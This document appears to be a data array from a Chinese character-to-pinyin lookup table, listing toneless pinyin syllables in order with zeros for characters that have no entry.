"qiong","ming","jiu","bu","mei","san","wei",0,0,"li","quan",0,"hun","xiang",0,"shi","ying",0,"nan","huang","jiu","yan",0,"sa","tuan","xie","zhe","men","xi","man",0,"huang","tan","xiao","ye","bi","luo","fan","li","cui","chua","dao","di","kuang","chu","xian","chan","mi","qian","qiu","zhen",0,0,0,"hu","gan","chi","guai","mu","bo","hua","geng","yao","mao","wang",0,0,0,"ru","xue","zheng","min","jiang",0,"zhan","zuo","yue","lie",0,"zhou","bi","ren","yu",0,"chuo","er","yi","mi","qing",0,"wang","ji","bu",0,"bie","fan","yue","li","fan","qu","fu","er","e","zheng","tian","yu","jin","qi","ju","lai","che","bei","niu","yi","xu","mou","xun","fu",0,"nin","ting","beng","zha","wei","ke","yao","ou","xiao","geng",
"tang","gui","hui","ta",0,"yao","da","qi","jin","lue","mi","mi","jian","lu","fan","ou","mi","jie","fu","bie","huang","su","yao","nie","jin","lian","bo","jian","ti","ling","zuan","shi","yin","dao","chou","ca","mie","yan","lan","chong","jiao","shuang","quan","nie","luo",0,"shi","luo","zhu",0,"chou","juan","jiong","er","yi","rui","cai","ren","fu","lan","sui","yu","you","dian","ling","zhu","ta","ping","zhai","jiao","chui","bu","kou","cun",0,"han","han","mou","hu","gong","di","fu","xuan","mi","mei","lang","gu","zhao","ta","yu","zong","li","lu","wu","lei","ji","li","li",0,"po","yang","wa","tuo","peng",0,"zhao","gui",0,"xu","nai","que","wei","zheng","dong","wei","bo",0,"huan","xuan","zan","li","yan","huang","xue","hu","bao","ran","xiao","po",
"liao","zhou","yi","xu","luo","kao","chu",0,"na","han","chao","lu","zhan","ta","fu","hong","zeng","qiao","su","pin","guan",0,"hun","chu",0,"er","er","ruan","qi","si","ju",0,"yan","bang","ye","zi","ne","chuang","ba","cao","ti","han","zuo","ba","zhe","wa","geng","bi","er","zhu","wu","wen","zhi","zhou","lu","wen","gun","qiu","la","zai","sou","mian","di","qi","cao","piao","lian","shi","long","su","qi","yuan","feng","xu","jue","di","pian","guan","niu","ren","zhen","gai","pi","tan","chao","chun","he","zhuan","mo","bie","qi","shi","bi","jue","si",0,"gua","na","hui","xi","er","xiu","mou",0,"xi","zhi","run","ju","die","zhe","shao","meng","bi","han","yu","xian","pang","neng","can","bu",0,"qi","ji","zhuo","lu","jun","xian","xi","cai",
"wen","zhi","zi","kun","cong","tian","chu","di","chun","qiu","zhe","zha","rou","bin","ji","xi","zhu","jue","ge","ji","da","chen","suo","ruo","xiang","huang","qi","zhu","sun","chai","weng","ke","kao","gu","gai","fan","cong","cao","zhi","chan","lei","xiu","zhai","zhe","yu","gui","gong","zan","dan","huo","sou","tan","gu","xi","man","duo","ao","pi","wu","ai","meng","pi","meng","yang","zhi","bo","ying","wei","rang","lan","yan","chan","quan","zhen","pu",0,"tai","fei","shu",0,"dang","cuo","tan","tian","chi","ta","jia","shun","huang","liao",0,0,"chen","jin","e","gou","fu","duo",0,"e","beng","tao","di",0,"di","bu","wan","zhao","lun","qi","mu","qian",0,"zong","sou",0,"you","zhou","ta",0,"su","bu","xi","jiang","cao","fu","teng","che","fu",
"fei","wu","xi","yang","ming","pang","mang","seng","meng","cao","tiao","kai","bai","xiao","xin","qi",0,0,"shao","huan","niu","xiao","chen","dan","feng","yin","ang","ran","ri","man","fan","qu","shi","he","bian","dai","mo","deng",0,0,"kuang",0,"cha","duo","you","hao",0,"gua","xue","lei","jin","qi","qu","wang","yi","liao",0,0,"yan","yi","yin","qi","zhe","xi","yi","ye","wu","zhi","zhi","han","chuo","fu","chun","ping","kuai","chou",0,"tuo","qiong","cong","gao","kua","qu","qu","zhi","meng","li","zhou","ta","zhi","gu","liang","hu","la","dian","ci","ying",0,0,"qi",0,"cha","mao","du","yin","chai","rui","hen","ruan","fu","lai","xing","jian","yi","mei",0,"mang","ji","suo","han",0,"li","zi","zu","yao","ge","li","qi","gong",
"li","bing","suo",0,0,"su","chou","jian","xie","bei","xu","jing","pu","ling","xiang","zuo","diao","chun","qing","nan","zhai","lu","yi","shao","yu","hua","li","pa",0,0,"li",0,0,"shuang",0,"yi","ning","si","ku","fu","yi","deng","ran","ce",0,"ti","qin","biao","sui","wei","dun","se","ai","qi","zun","kuan","fei",0,"yin",0,"sao","dou","hui","xie","ze","tan","tang","zhi","yi","fu","e",0,"jun","jia","cha","xian","man",0,"bi","ling","jie","kui","jia",0,"cheng","lang","xing","fei","lu","zha","he","ji","ni","ying","xiao","teng","lao","ze","kui",0,"qian","ju","piao","fan","tou","lin","mi","zhuo","xie","hu","mi","jie","za","cong","li","ran","zhu","yin","han",0,"yi","luan","yue","ran","ling","niang","yu","nue",0,
"yi","nue","yi","qian","xia","chu","yin","mi","xi","na","kan","zu","xia","yan","tu","ti","wu","suo","yin","chong","zhou","mang","yuan","nu","miao","zao","wan","li","qu","na","shi","bi","zi","bang",0,"juan","xiang","kui","pai","kuang","xun","zha","yao","kun","hui","xi","e","yang","tiao","you","jue","li",0,"li","cheng","ji","hu","zhan","fu","chang","guan","ju","meng","chang","tan","mou","xing","li","yan","sou","shi","yi","bing","cong","hou","wan","di","ji","ge","han","bo","xiu","liu","can","can","yi","xuan","yan","zao","han","yong","zong",0,"kang","yu","qi","zhe","ma",0,0,"shuang","jin","guan","pu","lin",0,"ting","jiang","la","yi","yong","ci","yan","jie","xun","wei","xian","ning","fu","ge",0,"mo","zhu","nai","xian","wen","li","can","mie",
"jian","ni","chai","wan","xu","nu","mai","zui","kan","ka","hang",0,0,"yu","wei","zhu",0,0,"yi",0,"diao","fu","bi","zhu","zi","shu","xia","ni",0,"jiao","xun","chong","nou","rong","zhi","sang",0,"shan","yu",0,"jin",0,"lu","han","bie","yi","zui","zhan","yu","wan","ni","guan","jue","beng","can",0,"duo","qi","yao","kui","ruan","hou","xun","xie",0,"kui",0,"xie","bo","ke","cui","xu","bai","ou","zong",0,"ti","chu","chi","niao","guan","feng","xie","deng","wei","jue","kui","zeng","sa","duo","ling","meng",0,"guo","meng","long",0,"ying",0,"guan","cu","li","du",0,"biao",0,"xi",0,"de","de","xian","lian",0,"shao","xie","shi","wei",0,0,"he","you","lu","lai","ying","sheng","juan","qi","jian","yun",
0,"qi",0,"lin","ji","mai","chuang","nian","bin","li","ling","gang","cheng","xuan","xian","hu","bi","zu","dai","dai","hun","sai","che","ti",0,"nuo","zhi","liu","fei","jiao","guan","xi","lin","xuan","reng","tao","pi","xin","shan","zhi","wa","tou","tian","yi","xie","pi","yao","yao","nu","hao","nin","yin","fan","nan","yao","wan","yuan","xia","zhou","yuan","shi","mian","xi","ji","tao","fei","xue","ni","ci","mi","bian",0,"na","yu","e","zhi","ren","xu","lue","hui","xun","nao","han","jia","dou","hua","tu","ping","cu","xi","song","mi","xin","wu","qiong","zhang","tao","xing","jiu","ju","hun","ti","man","yan","ji","shou","lei","wan","che","can","jie","you","hui","zha","su","ge","nao","xi",0,"dui","chi","wei","zhe","gun","chao","chi","zao","hui","luan",
"liao","lao","tuo","hui","wu","ao","she","sui","mai","tan","xin","jing","an","ta","chan","wei","tuan","ji","chen","che","yu","xian","xin",0,0,0,"nao",0,"yan","qiu","jiang","song","jun","liao","ju",0,"man","lie",0,"chu","chi","xiang","qin","mei","shu","chai","chi","gu","yu","yin",0,"liu","lao","shu","zhe","shuang","hui",0,0,"e",0,"sha","zong","jue","jun","tuan","lou","wei","chong","zhu","lie",0,"zhe","zhao",0,"yi","chu","ni","bo","suan","yi","hao","ya","huan","man","man","qu","lao","hao","zhong","min","xian","zhen","shu","zuo","zhu","gou","xuan","yi","zhi","xie","jin","can",0,"bu","liang","zhi","ji","wan","guan","ju","jing","ai","fu","gui","hou","yan","ruan","zhi","biao","yi","suo","die","gui","sheng","xun","chen","she","qing",
0,0,"chun","hong","dong","cheng","wei","ru","shu","cai","ji","za","qi","yan","fu","yu","fu","po","zhi","tan","zuo","che","qu","you","he","hou","gui","e","jiang","yun","tou","cun","tu","fu","zuo","hu",0,"bo","zhao","jue","tang","jue","fu","huang","chun","yong","chui","suo","chi","qian","cai","xiao","man","can","qi","jian","bi","ji","zhi","zhu","qu","zhan","ji","bian",0,"li","li","yue","quan","cheng","fu","cha","tang","shi","hang","qie","qi","bo","na","tou","chu","cu","yue","zhi","chen","chu","bi","meng","ba","tian","min","lie","feng","cheng","qiu","tiao","fu","kuo","jian",0,0,0,"zhen","qiu","zuo","chi","kui","lie","bei","du","wu",0,"zhuo","lu","tang",0,"chu","liang","tian","kun","chang","jue","tu","huan","fei","bi",0,"xia","wo",
"ji","qu","kui","hu","qiu","sui","cai",0,"qiu","pi","pang","wa","yao","rong","xun","cu","die","chi","cuo","meng","xuan","duo","bie","zhe","chu","chan","gui","duan","zou","deng","lai","teng","yue","quan","zhu","ling","chen","zhen","fu","she","tiao","kua","ai",0,"qiong","shu","hai","shan","wai","zhan","long","jiu","li",0,"chun","rong","yue","jue","kang","fan","qi","hong","fu","lu","hong","tuo","min","tian","juan","qi","zheng","qing","gong","tian","lang","mao","yin","lu","yuan","ju","pi",0,"xie","bian","hun","zhu","rong","sang","wu","cha","keng","shan","peng","man","xiu",0,"cong","keng","zhuan","chan","si","chong","sui","bei","kai",0,"zhi","wei","min","ling","zuan","nie","ling","qi","yue",0,"yi","xi","chen",0,"rong","chen","nong","you","ji","bo","fang",0,0,
"cu","di","jiao","yu","he","xu","yu","qu",0,"bai","geng","jiong",0,"ya","shu","you","song","ye","cang","yao","shu","yan","shuai","liao","cong","yu","bo","sui",0,"yan","lei","lin","ti","du","yue","ji",0,"yun",0,0,"ju","ju","chu","chen","gong","xiang","xian","an","gui","yu","lei",0,"tu","chen","xing","qiu","hang",0,"dang","cai","di","yan","zi",0,"ying","chan",0,"li","suo","ma","ma",0,"tang","pei","lou","qi","cuo","tu","e","can","jie","yi","ji","dang","jue","bi","lei","yi","chun","chun","po","li","zai","tai","po","cu","ju","xu","fan",0,"xu","er","huo","zhu","ran","fa","juan","han","liang","zhi","mi","yu",0,"cen","mei","yin","mian","tu","kui",0,0,"mi","rong","yu","qiang","mi","ju","pi","jin",
"wang","ji","meng","jian","xue","bao","gan","chan","li","li","qiu","dun","ying","yun","chen","zhi","ran",0,"lue","kai","gui","yue","hui","pi","cha","duo","chan","sha","shi","she","xing","ying","shi","chi","ye","han","fei","ye","yan","zuan","sou","jin","duo","xian","guan","tao","qie","chan","han","meng","yue","cu","qian","jin","shan","mu","yuan",0,"peng","zheng","zhi","chun","yu","mou","wan","jiang","qi","su","pie","tian","kuan","cu","sui",0,"jie","jian","ao","jiao","ye",0,"ye","long","zao","bao","lian",0,"huan","lu","wei","xian","tie","bo","zheng","zhu","bei","meng","xie","ou","you",0,"xiao","li","zha","mi",0,"ye",0,0,"po","xie",0,0,0,"shan","zhuo",0,"shan","jue","ji","jie",0,"niao","ao","chu","wu","guan","xie","ting","xue",
"dang","zhan","tan","peng","xie","xu","xian","si","kua","zheng","wu","huo","run","wen","du","huan","kuo","fu","chuai","xian","qin","qie","lan",0,"ya","ying","que","hang","chun","zhi",0,"wei","yan","xiang","yi","ni","zheng","chuai",0,"shi","ding","zi","jue","xu","yuan",0,0,"xu","dao","tian","ge","yi","hong","yi",0,"li","ku","xian","sui","xi","xuan",0,0,"di","lai","zhou","nian","cheng","jian","bi","zhuan","ling","hao","bang","tang","chi","ma","xian","shuan","yong","qu",0,"pu","hui","wei","yi","ye",0,"che","hao","bin",0,"xian","chan","hun",0,"han","ci","zhi","qi","kui","rou",0,"ying","xiong",0,"hu","cui",0,"que","di","wu","qiu",0,"yan","liao","bi",0,"bin",0,"yuan","nue","bao","ying","hong","ci","qia","ti","yu",
"lei","bao",0,"ji","fu","xian","cen","hu","se","beng","qing","yu","wa","ai","han","dan","ge","di","huo","pang",0,"zhui","ling","mai","mai","lian","xiao","xue","zhen","po","fu","nou","xi","dui","dan","yun","xian","yin","shu","dui","beng","hu","fei","fei","za","bei","fei","xian","shi","mian","zhan","zhan","zhan","hui","fu","wan","mo","qiao","liao",0,"mie","hu","hong","yu","qi","duo","ang",0,"ba","di","xuan","di","bi","zhou","pao","tie","yi",0,"jia","zhi","tu","xie","dan","tiao","xie","chang","yuan","guan","liang","beng",0,"lu","ji","xuan","shu","du","sou","hu","yun","chan","bang","rong","e","weng","ba","feng","yu","zhe","fen","guan","bu","ge","dun","huang","du","ti","bo","qian","lie","long","wei","zhan","lan","sui","na","bi","tuo","zhu","die",
"bu","ju","po","xia","wei","po","da","fan","chan","hu","za",0,0,0,0,0,"fan","xie","hong","chi","bao","yin",0,"jing","bo","ruan","chou","ying","yi","gai","kun","yun","zhen","ya","ju","hou","min","bai","ge","bian","zhuo","hao","zhen","sheng","gen","bi","duo","chun","chua","san","cheng","ran","chen","mao","pei","wei","pi","fu","zhuo","qi","lin","yi","men","wu","qi","die","chen","xia","he","sang","gua","hou","ao","fu","qiao","hun","pi","yan","si","xi","ming","kui","ge",0,"ao","san","shuang","lou","zhen","hui","chan",0,"lin","na","han","du","jin","mian","fan","e","chao","hong","hong","yu","xue","pao","bi","chao","you","yi","xue","sa","xu","li","li","yuan","dui","huo","sha","leng","pou","hu","guo","bu","rui","wei","sou","an","yu",
"xiang","heng","yang","xiao","yao",0,"bi",0,"heng","tao","liu",0,"zhu",0,"xi","zan","yi","dou","yuan","jiu",0,"bo","ti","ying",0,"yi","nian","shao","ben","gou","ban","mo","gai","en","she",0,"zhi","yang","jian","yuan","shui","ti","wei","xun","zhi","yi","ren","shi","hu","ne","ye","jian","sui","ying","bao","hu","hu","ye",0,"yang","lian","xi","en","dui","zan","zhu","ying","ying","jin","chuang","dan",0,"kuai","yi","ye","jian","en","ning","ci","qian","xue","bo","mi","shui","mo","liang","qi","qi","shou","fu","bo","beng","bie","yi","wei","huan","fan","qi","mao","bao","ang","ang","fu","qi","qun","tuo","yi","bo","pian","ba",0,"xuan",0,0,"yu","chi","lu","yi","li",0,"niao","xi","wu",0,"lei","pu","zhuo","zui","zhuo",
"chang","an","er","yu","leng","fu","zha","hun","chun","sou","bi","bi","zha",0,"he","li",0,"han","zai","gu","cheng","lou","mo","mi","mai","ao","zhe","zhu","huang","fan","deng","tong",0,"du","wo","wei","ji","chi","lin","biao","long","jian","nie","luo","shen",0,"gua","nie","yi","ku","wan","wa","qia","bo","kao","ling","gan","gua","hai","kuang","heng","kui","ze","ting","lang","bi","huan","po","yao","wan","ti","sui","kua","dui","ao","jian","mo","kui","kuai","an","ma","qing","qiao",0,"kao","hao","duo","xian","nai","suo","jie","pi","pa","song","chang","nie","man","song","ci","xian","kuo",0,"di","pou","tiao","zu","wo","fei","cai","peng","sai",0,"rou","qi","cuo","pan","bo","man","zong","ci","kui","ji","lan",0,"meng","mian","pan","lu","zuan",
0,"liu","yi","wen","li","li","zeng","zhu","hun","shen","chi","xing","wang","dong","huo","pi","hu","mei","che","mei","chao","ju","nou",0,"yi","ru","ling","ya",0,"qi","zi",0,"bang","gong","ze","jie","yu","qin","bei","ba","tuo","yang","qiao","you","zhi","jie","mo","sheng","shan","qi","shan","mi","gong","yi","geng","geng","tou","fu","xue","ye","ting","tiao","mou","liu","can","li","shu","lu","huo","cuo","pai","liu","ju","zhan","ju","zheng","zu","xian","zhi",0,0,"la",0,0,"la","xu","geng","e","mu","zhong","ti","yuan","zhan","geng","weng","lang","yu","sou","zha","hai","hua","zhan",0,"lou","chan","zhi","wei","xuan","zao","min","gui","su",0,0,"si","duo","cen","kuan","teng","nei","lao","lu","yi","xie","yan","qing","pu","chou","xian",
"guan","jie","lai","meng","ye",0,"li","yin","chun","qiu","teng","yu",0,0,"dai","du","hong",0,"xi",0,"qi",0,"yuan","ji","yun","fang","gong","hang","zhen","que",0,0,"jie","pi","gan","xuan","sheng","shi","qiao","ci","die","bo","diao","wan","ci","zhi","bai","wu","bao","dan","ba","tong",0,"gong","jiu","gui","ci","you","yuan","lao","ju","fu","nie","e","e","xing","kan","yan","tu","pou","beng","ming","shui","yan","qi","yuan","bie",0,"xuan","hou","huang","yao","juan","kui","e","ji","mo","chong","bao","wu","zhen","xu","ta","chi","xi","cong","ma","kou","yan","can",0,"he","deng","ran","tong","yu","xiang","nao","shun","fen","pu","ling","ao","huan","yi","huan","meng","ying","lei","yan","bao","die","ling","shi","jiao","lie","jing","ju","ti",
"pi","gang","xiao","wai","chuai","di","huan","yao","li","mi","hu","sheng","jia","yin","wei",0,"piao","lu","ling","yi","cai","shan","hu","shu","tuo","mo","hua","tie","bing","peng","hun","fu","guo","bu","li","chan","pi","cuo","meng","suo","qiang","zhi","kuang","bi","ao","meng","xian","ku","tou","tuan","wei","xian",0,"tuan","lao","chan","ni","ni","li","dong","ju","qian","bo","shai","zha","tao","qian","nong","yi","jing","gan","di","jian","mei","da","jian","yu","xie","zai","mang","li","gun","xun","ta","zhe","yang","tuan","shang","xi","qiao","wei","ying","chua","qu","wa",0,"zhi","ting","gu","shang","ca","fu","tie","ta","ta","zhuo","han","ping","he","zhui","zhou","bo","liu","nu","xi","pao","di","he","ti","wai","ti","qi","ji","chi","ba","jin","ke","li","ju",
"qu","la","gu","qia","qi","xian","jian","shi","jian","ai","hua","zha","ze","yao","zhan","ji","cha","yan","jian",0,"yan",0,"jiao","tong","nan","yue",0,"chi",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"yi","ding","kao","qi","shang","xia","han","wan","zhang","san","shang","xia","ji","bu","yu","mian","gai","chou","chou","zhuan","qie","pi","shi","shi","qiu","bing","ye",
"cong","dong","si","cheng","diu","qiu","liang","diu","you","liang","yan","bing","sang","gun","jiu","ge","ya","qiang","zhong","ji","jie","feng","guan","chuan","chan","lin","zhuo","zhu","ha","wan","dan","wei","zhu","jing","li","ju","pie","fu","yi","yi","nai","wu","jiu","jiu","tuo","me","yi","yi","zhi","wu","zha","hu","fa","le","yin","ping","pang","qiao","hu","guai","cheng","cheng","yi","yin","ya","mie","jiu","qi","ye","xi","xiang","gai","jiu","xia","hu","shu","dou","shi","ji","nang","jia","ju","shi","mao","hu","mai","luan","zi","ru","xue","yan","fu","sha","na","gan","suo","yu","cui","zhe","gan","zhi","gui","gan","luan","lin","yi","jue","le","ma","yu","zheng","shi","shi","er","chu","yu","kui","yu","yun","hu","qi","wu","jing","si","sui","gen","gen","ya","xie",
"ya","qi","ya","ji","tou","wang","kang","ta","jiao","hai","yi","chan","heng","mu","ye","xiang","jing","ting","liang","xiang","jing","ye","qin","bo","you","xie","dan","lian","duo","men","ren","ren","ji","ji","wang","yi","shen","ren","le","ding","ze","jin","pu","chou","ba","zhang","jin","jie","bing","reng","cong","fo","san","lun","bing","cang","zi","shi","ta","zhang","fu","xian","xian","tuo","hong","tong","ren","qian","gan","ge","bo","dai","ling","yi","chao","chang","sa","shang","yi","mu","men","ren","jia","chao","yang","qian","zhong","pi","wo","wu","jian","jia","yao","feng","cang","ren","wang","fen","di","fang","zhong","qi","pei","yu","diao","dun","wu","yi","xin","kang","yi","ji","ai","wu","ji","fu","fa","xiu","jin","pi","dan","fu","tang","zhong","you","huo","hui","yu","cui",
"chuan","san","wei","chuan","che","ya","xian","shang","chang","lun","cang","xun","xin","wei","zhu","ze","xian","nu","bo","gu","ni","ni","xie","ban","xu","ling","zhou","shen","qu","ci","beng","shi","jia","pi","yi","si","yi","zheng","dian","han","mai","dan","zhu","bu","qu","bi","zhao","ci","wei","di","zhu","zuo","you","yang","ti","zhan","he","bi","tuo","she","yu","yi","fu","zuo","gou","ning","tong","ni","xian","qu","yong","wa","qian","shi","ka","bao","pei","hui","he","lao","xiang","ge","yang","bai","fa","ming","jia","er","bing","ji","hen","huo","gui","quan","tiao","jiao","ci","yi","shi","xing","shen","tuo","kan","zhi","gai","lai","yi","chi","kua","guang","li","yin","shi","mi","zhu","xu","you","an","lu","mou","er","lun","dong","cha","chi","xun","gong","zhou","yi",
"ru","cun","xia","si","zai","lu","ta","jiao","zhen","ce","qiao","kuai","chai","ning","nong","jin","wu","hou","jiong","cheng","zhen","zuo","chou","qin","lu","ju","shu","ting","shen","tui","bo","nan","xiao","bian","tui","yu","xi","cu","e","qiu","xu","guang","ku","wu","jun","yi","fu","liang","zu","qiao","li","yong","hun","jing","qian","san","pei","su","fu","xi","li","fu","ping","bao","yu","qi","xia","xin","xiu","yu","di","che","chou","zhi","yan","lia","li","lai","si","jian","xiu","fu","huo","ju","xiao","pai","jian","biao","chu","fei","feng","ya","an","bei","yu","xin","bi","hu","chang","zhi","bing","jiu","yao","cui","lia","wan","lai","cang","zong","ge","guan","bei","tian","shu","shu","men","dao","tan","jue","chui","xing","peng","tang","hou","yi","qi","ti","gan","jing",
"jie","sui","chang","jie","fang","zhi","kong","juan","zong","ju","qian","ni","lun","zhuo","wo","luo","song","leng","hun","dong","zi","ben","wu","ju","nai","cai","jian","zhai","ye","zhi","sha","qing","qie","ying","cheng","jian","yan","ruan","zhong","chun","jia","ji","wei","yu","bing","ruo","ti","wei","pian","yan","feng","tang","wo","e","xie","che","sheng","kan","di","zuo","cha","ting","bei","xie","huang","yao","zhan","chou","yan","you","jian","xu","zha","ci","fu","bi","zhi","zong","mian","ji","yi","xie","xun","cai","duan","ce","zhen","ou","tou","tou","bei","za","lou","jie","wei","fen","chang","gui","sou","zhi","su","xia","fu","yuan","rong","li","nu","yun","jiang","ma","bang","dian","tang","hao","jie","xi","shan","qian","jue","cang","chu","san","bei","xiao","yong","yao","tan","suo","yang",
"fa","bing","jia","dai","zai","tang","gu","bin","chu","nuo","can","lei","cui","yong","zao","zong","beng","song","ao","chuan","yu","zhai","zu","shang","chuang","jing","chi","sha","han","zhang","qing","yan","di","xie","lou","bei","piao","jin","lian","lu","man","qian","xian","tan","ying","dong","zhuan","xiang","shan","qiao","jiong","tui","zun","pu","xi","lao","chang","guang","liao","qi","cheng","chan","wei","ji","bo","hui","chuan","tie","dan","jiao","jiu","seng","fen","xian","ju","e","jiao","jian","tong","lin","bo","gu","xian","su","xian","jiang","min","ye","jin","jia","qiao","pi","feng","zhou","ai","sai","yi","jun","nong","chan","yi","dang","jing","xuan","kuai","jian","chu","dan","jiao","sha","zai","can","bin","an","ru","tai","chou","chai","lan","ni","jin","qian","meng","wu","ning","qiong","ni","chang","lie",
"lei","lu","kuang","bao","yu","biao","zan","zhi","si","you","hao","chen","chen","li","teng","wei","long","chu","chan","rang","shu","hui","li","luo","zan","nuo","tang","yan","lei","nang","er","wu","yun","zan","yuan","xiong","chong","zhao","xiong","xian","guang","dui","ke","dui","mian","tu","chang","er","dui","er","jin","tu","si","yan","yan","shi",0,"dang","qian","dou","fen","mao","shen","dou",0,"jing","li","huang","ru","wang","nei","quan","liang","yu","ba","gong","liu","xi","han","lan","gong","tian","guan","xing","bing","qi","ju","dian","zi","fen","yang","jian","shou","ji","yi","ji","chan","jiong","mao","ran","nei","yuan","mao","gang","ran","ce","jiong","ce","zai","gua","jiong","mao","zhou","mao","gou","xu","mian","mi","rong","yin","xie","kan","jun","nong","yi","mi","shi","guan","meng",
"zhong","ju","yuan","ming","kou","lin","fu","xie","mi","bing","dong","tai","gang","feng","bing","hu","chong","jue","hu","kuang","ye","leng","pan","fu","min","dong","xian","lie","qia","jian","jing","shu","mei","tu","qi","gu","zhun","song","jing","liang","qing","diao","ling","dong","gan","jian","yin","cou","yi","li","chuang","ming","zhun","cui","si","duo","jin","lin","lin","ning","xi","du","ji","fan","fan","fan","feng","ju","chu","zheng","feng","mu","zhi","fu","feng","ping","feng","kai","huang","kai","gan","deng","ping","qian","xiong","kuai","tu","ao","chu","ji","dang","han","han","zao","dao","diao","dao","ren","ren","chuang","fen","qie","yi","ji","kan","qian","cun","chu","wen","ji","dan","xing","hua","wan","jue","li","yue","lie","liu","ze","gang","chuang","fu","chu","qu","ju","shan","min","ling",
"zhong","pan","bie","jie","jie","pao","li","shan","bie","chan","jing","gua","geng","dao","chuang","kui","ku","duo","er","zhi","shua","quan","sha","ci","ke","jie","gui","ci","gui","kai","duo","ji","ti","jing","lou","luo","ze","yuan","cuo","xue","ke","la","qian","sha","chuang","gua","jian","cuo","li","ti","fei","pou","chan","qi","chuang","zi","gang","wan","bo","ji","duo","qing","shan","du","jian","ji","bo","yan","ju","huo","sheng","jian","duo","duan","wu","gua","fu","sheng","jian","ge","da","kai","chuang","chuan","chan","tuan","lu","li","peng","shan","piao","kou","jiao","gua","qiao","jue","hua","zha","zhuo","lian","ju","pi","liu","gui","jiao","gui","jian","jian","tang","huo","ji","jian","yi","jian","zhi","chan","jian","mo","li","zhu","li","ya","quan","ban","gong","jia","wu","mai","lie",
"jin","keng","xie","zhi","dong","zhu","nu","jie","qu","shao","yi","zhu","mo","li","jin","lao","lao","juan","kou","yang","wa","xiao","mou","kuang","jie","lie","he","shi","ke","jin","gao","bo","min","chi","lang","yong","yong","mian","ke","xun","juan","qing","lu","bu","meng","chi","lei","kai","mian","dong","xu","xu","kan","wu","yi","xun","weng","sheng","lao","mu","lu","piao","shi","ji","qin","jiang","chao","quan","xiang","yi","jue","fan","juan","tong","ju","dan","xie","mai","xun","xun","lu","li","che","rang","quan","bao","shao","yun","jiu","bao","gou","wu","yun","wen","bi","gai","gai","bao","cong","yi","xiong","peng","ju","tao","ge","pu","e","pao","fu","gong","da","jiu","qiong","bi","hua","bei","nao","shi","fang","jiu","yi","za","jiang","kang","jiang","kuang","hu","xia","qu",
"bian","gui","qie","zang","kuang","fei","hu","yu","gui","kui","hui","dan","gui","lian","lian","suan","du","jiu","jue","xi","pi","qu","yi","ke","yan","bian","ni","qu","shi","xun","qian","nian","sa","zu","sheng","wu","hui","ban","shi","xi","wan","hua","xie","wan","bei","zu","zhuo","xie","dan","mai","nan","dan","ji","bo","shuai","bo","kuang","bian","bu","zhan","ka","lu","you","lu","xi","gua","wo","xie","jie","jie","wei","ang","qiong","zhi","mao","yin","wei","shao","ji","que","luan","chi","juan","xie","xu","jin","que","wu","ji","e","qing","xi","san","chang","wei","e","ting","li","zhe","han","li","ya","ya","yan","she","di","zha","pang","ya","he","ya","zhi","ce","pang","ti","li","she","hou","ting","zui","cuo","fei","yuan","ce","yuan","xiang","yan","li","jue",
"sha","dian","chu","jiu","jin","ao","gui","yan","si","li","chang","lan","li","yan","yan","yuan","si","gong","lin","rou","qu","qu","er","lei","du","xian","zhuan","san","can","can","can","can","ai","dai","you","cha","ji","you","shuang","fan","shou","guai","ba","fa","ruo","shi","shu","zhuo","qu","shou","bian","xu","jia","pan","sou","gao","wei","sou","die","rui","cong","kou","gu","ju","ling","gua","dao","kou","zhi","jiao","zhao","ba","ding","ke","tai","chi","shi","you","qiu","po","ye","hao","si","tan","chi","le","diao","ji","liao","hong","mie","xu","mang","chi","ge","xuan","yao","zi","he","ji","diao","cun","tong","ming","hou","li","tu","xiang","zha","xia","ye","lu","ya","ma","ou","huo","yi","jun","chou","lin","tun","yin","fei","bi","qin","qin","jie","bu","fou",
"ba","dun","fen","e","han","ting","keng","shun","qi","hong","zhi","yin","wu","wu","chao","na","xue","xi","chui","dou","wen","hou","hong","wu","gao","ya","jun","lu","e","ge","mei","dai","qi","cheng","wu","gao","fu","jiao","hong","chi","sheng","na","tun","fu","yi","dai","ou","li","bei","yuan","guo","wen","qiang","wu","e","shi","juan","pen","wen","ne","m","ling","ran","you","di","zhou","shi","zhou","tie","xi","yi","qi","ping","zi","gu","ci","wei","xu","a","nao","ga","pei","yi","xiao","shen","hu","ming","da","qu","ju","han","za","tuo","duo","pou","pao","bie","fu","yang","he","za","he","hai","jiu","yong","fu","da","zhou","wa","ka","gu","ka","zuo","bu","long","dong","ning","ta","si","xian","huo","qi","er","e","guang","zha","xi","yi","lie",
"zi","mie","mi","zhi","yao","ji","zhou","ge","shu","zan","xiao","hai","hui","kua","huai","tao","xian","e","xuan","xiu","guo","yan","lao","yi","ai","pin","shen","tong","hong","xiong","duo","wa","ha","zai","you","die","pai","xiang","ai","gen","kuang","ya","da","xiao","bi","hui","nian","hua","xing","kuai","duo","fen","ji","nong","mou","yo","hao","yuan","long","pou","mang","ge","o","chi","shao","li","na","zu","he","ku","xiao","xian","lao","bo","zhe","zha","liang","ba","mie","lie","sui","fu","bu","han","heng","geng","shuo","ge","you","yan","gu","gu","bei","han","suo","chun","yi","ai","jia","tu","xian","wan","li","xi","tang","zuo","qiu","che","wu","zao","ya","dou","qi","di","qin","ma","mo","gong","dou","qu","lao","liang","suo","zao","huan","lang","sha","ji","zuo",
"wo","feng","jin","hu","qi","shou","wei","shua","chang","er","li","qiang","an","ze","yo","nian","yu","tian","lai","sha","xi","tuo","hu","ai","zhao","nou","ken","zhuo","zhuo","shang","di","heng","lin","a","cai","xiang","tun","wu","wen","cui","sha","gu","qi","qi","tao","dan","dan","ye","zi","bi","cui","chuai","he","ya","qi","zhe","fei","liang","xian","pi","sha","la","ze","ying","gua","pa","zhe","se","zhuan","nie","guo","luo","yan","di","quan","chan","bo","ding","lang","xiao","ju","tang","chi","ti","an","jiu","dan","ka","yong","wei","nan","shan","yu","zhe","la","jie","hou","han","die","zhou","chai","wai","nuo","yu","yin","za","yao","o","mian","hu","yun","chuan","hui","huan","huan","xi","he","ji","kui","zhong","wei","sha","xu","huang","duo","nie","xuan","liang","yu",
